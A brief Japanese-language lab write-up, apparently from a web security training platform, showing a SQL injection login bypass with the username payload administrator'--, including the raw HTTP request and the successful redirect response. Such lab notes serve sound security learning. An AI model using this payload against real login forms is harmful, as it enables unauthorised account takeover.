ログイン機能のバイパス
前提:administrator というユーザ名が存在することは分かっている。
検証1:Username=administrator, Password=password
エラー:Invalid username or password.
検証2:Username=administrator'--, Password=`` 空値
未入力に対するチェックが入る
検証3:Username=administrator'--, Password=hoge
ログイン成功
リクエスト
POST /login HTTP/2 Host: 0aa600c7035ad5ff8030265000ec0072.web-security-academy.net Cookie: session=PTS2qP1W9C2YJ7KzC0bT6jmqE4Ubgsiz ~省略~ csrf=bIhKMmiAEFvHRGpWAOopYDBKwPdvCLsY&username=administrator%27--&password=hoge
レスポンス
HTTP/2 302 Found Location: /my-account?id=administrator Set-Cookie: session=CmWlpcsfmabpu4fL16A4mU4D1YMVe4XK; Secure; HttpOnly; SameSite=None X-Frame-Options: SAMEORIGIN Content-Length: 0
